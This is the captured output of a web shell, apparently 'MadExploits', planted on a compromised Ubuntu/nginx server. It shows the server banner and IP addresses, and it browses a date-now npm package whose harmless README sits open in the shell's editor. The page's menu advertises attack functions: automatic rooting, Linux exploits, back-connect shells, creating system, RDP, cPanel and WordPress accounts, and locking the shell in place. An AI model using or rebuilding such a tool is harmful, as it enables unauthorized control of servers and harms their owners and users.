Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
date-now /
[ HOME SHELL ]
Name
Size
Permission
Action
test
[ DIR ]
drwxr-xr-x
.npmignore
135
B
-rw-r--r--
.testem.json
304
B
-rw-r--r--
.travis.yml
43
B
-rw-r--r--
LICENCE
1.03
KB
-rw-r--r--
README.md
824
B
-rw-r--r--
index.js
73
B
-rw-r--r--
package.json
1.39
KB
-rw-r--r--
seed.js
271
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# date-now [![build status][1]][2] [![browser support][3]][4] A requirable version of Date.now() Use-case is to be able to mock out Date.now() using require interception. ## Example ```js var now = require("date-now") var ts = now() var ts2 = Date.now() assert.equal(ts, ts2) ``` ## example of seed ``` var now = require("date-now/seed")(timeStampFromServer) // ts is in "sync" with the seed value from the server // useful if your users have their local time being a few minutes // out of your server time. var ts = now() ``` ## Installation `npm install date-now` ## Contributors - Raynos ## MIT Licenced [1]: https://secure.travis-ci.org/Colingo/date-now.png [2]: http://travis-ci.org/Colingo/date-now [3]: http://ci.testling.com/Colingo/date-now.png [4]: http://ci.testling.com/Colingo/date-now
Close